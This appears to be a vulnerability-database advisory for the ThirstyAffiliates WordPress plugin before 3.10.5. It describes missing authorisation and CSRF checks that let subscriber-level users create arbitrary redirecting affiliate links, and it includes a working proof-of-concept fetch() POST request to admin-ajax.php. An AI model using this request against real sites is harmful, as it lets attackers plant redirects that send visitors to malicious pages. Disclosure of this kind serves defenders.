Lucene search

K
wpexploitKrzysztof ZającWPEX-ID:21AEC131-91FF-4300-AC7A-0BF31D6B2B24
HistoryMar 31, 2022 - 12:00 a.m.

ThirstyAffiliates Affiliate Link Manager < 3.10.5 - Subscriber+ Arbitrary Affiliate Links Creation

2022-03-3100:00:00
Krzysztof Zając
103

0.001 Low

EPSS

Percentile

21.4%

The plugin does not have authorisation and CSRF checks when creating affiliate links, which could allow any authenticated user, such as subscriber to create arbitrary affiliate links, which could then be used to redirect users to an arbitrary website

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": "action=ta_process_quick_add_affiliate_link&ta_link_name=test&ta_destination_url=https://wpscan.com/&ta_redirect_type=301",
  "method": "POST",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

0.001 Low

EPSS

Percentile

21.4%

Related for WPEX-ID:21AEC131-91FF-4300-AC7A-0BF31D6B2B24